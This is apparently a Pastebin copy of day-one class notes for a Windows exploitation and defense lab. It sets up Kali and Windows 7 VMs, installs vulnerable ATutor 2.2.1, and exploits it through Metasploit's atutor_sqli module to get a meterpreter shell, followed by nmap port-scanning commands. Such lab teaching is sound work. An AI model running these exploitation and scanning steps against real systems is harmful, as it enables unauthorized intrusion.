Advertisement
Guest User

windows-day1

a guest
Feb 20th, 2019
265
0
Never
Not a member of Pastebin yet? Sign Up, it unlocks many cool features!
text 2.25 KB | None | 0 0
  1. Windows Exploitation and Defense
  2. --------------------------------
  3.  
  4. Network settings for lab
  5. ------------------------
  6. select oracle vm manager
  7.  
  8. File -> Preferences
  9. Network -> Select Plus
  10. Ok
  11.  
  12. select Kali Linux 2018 -> Settings
  13. Network -> NATNetwork
  14. Ok
  15.  
  16. Start
  17.  
  18. Kali - attacker
  19. ---------------
  20. username: root
  21. password: toor
  22.  
  23. terminal -> command prompt
  24.  
  25. ifconfig
  26. same as ipconfig on Windows
  27.  
  28. start metasploit
  29. msfconsole
  30.  
  31. Victim / target
  32. ----------------
  33. Select Win7 machine
  34. Settings -> Network ->
  35. NatNetwork
  36. OK
  37. Start
  38.  
  39. on windows7 vm
  40. go to start
  41. xampp
  42. start apache and mysql services
  43.  
  44. open browser
  45. download https://sourceforge.net/projects/atutor/files/ATutor%202/
  46.  
  47. download and extract atutor 2.2.1
  48. place the folder inside C:/xampp/htdocs
  49.  
  50. install atutor
  51.  
  52. go to http://localhost/atutor to complete the installation.
  53.  
  54. ----------
  55. first attack using metasploit
  56. -----------------------------
  57. msfconsole
  58. search atutor
  59. info exploit/multi/http/atutor_sqli
  60. use exploit/multi/http/atutor_sqli
  61. show options
  62. set RHOSTS <Windows 7 IP>
  63. run
  64.  
  65. meterpreter>help
  66. meterpreter>ps
  67. meterpreter>sysinfo
  68. meterpreter>pwd
  69. meterpreter>cd C:
  70. meterpreter>mkdir KBNN
  71.  
  72. additional metasploit commands
  73. ------------------------------
  74. help
  75. show <module name>
  76. show auxiliary
  77.  
  78. info <path>
  79. info exploit/multi/http/atutor_sqli
  80.  
  81. use <path>
  82. use exploit/multi/http/atutor_sqli
  83.  
  84. show options
  85.  
  86. set <parameter name> value
  87. set RHOSTS 10.0.2.4
  88.  
  89. discussion
  90. -----------
  91. Find out what happens when we log into Windows machine
  92. What hashing algorithm is used by Windows OS?
  93. Is the hashing algorithm strong enough?
  94. Where is the password stored on Windows machine?
  95. Why is minimum password length 8 ????
  96.  
  97. port scanning
  98. -------------
  99. search portscan
  100. use auxiliary/scanner/portscan/syn
  101. show options
  102. set RHOSTS <Windows7 IP>
  103. run
  104.  
  105. nmap -h
  106. man nmap
  107. press space to continue reading
  108. press q to exit
  109.  
  110. nmap <Win7 IP>
  111. nmap 10.0.2.4
  112.  
  113. nmap -v <Win7 IP>
  114. nmap -v -sS <Win7 IP>
  115. nmap -v -sT <Win7 IP>
  116.  
  117. nmap -sV <port number> <Win7 IP>
  118. nmap -O <Win7 IP>
  119. nmap -A <Win7 IP> filename
  120.  
  121. reference urls
  122. ---------------
  123. https://www.cvedetails.com/
  124. https://www.first.org/cvss/calculator/3.0#
  125. https://md5hashing.net/
  126. https://tobtu.com/lmntlm.php
  127. https://nmap.org/
Advertisement
Add Comment
Please, Sign In to add comment
Advertisement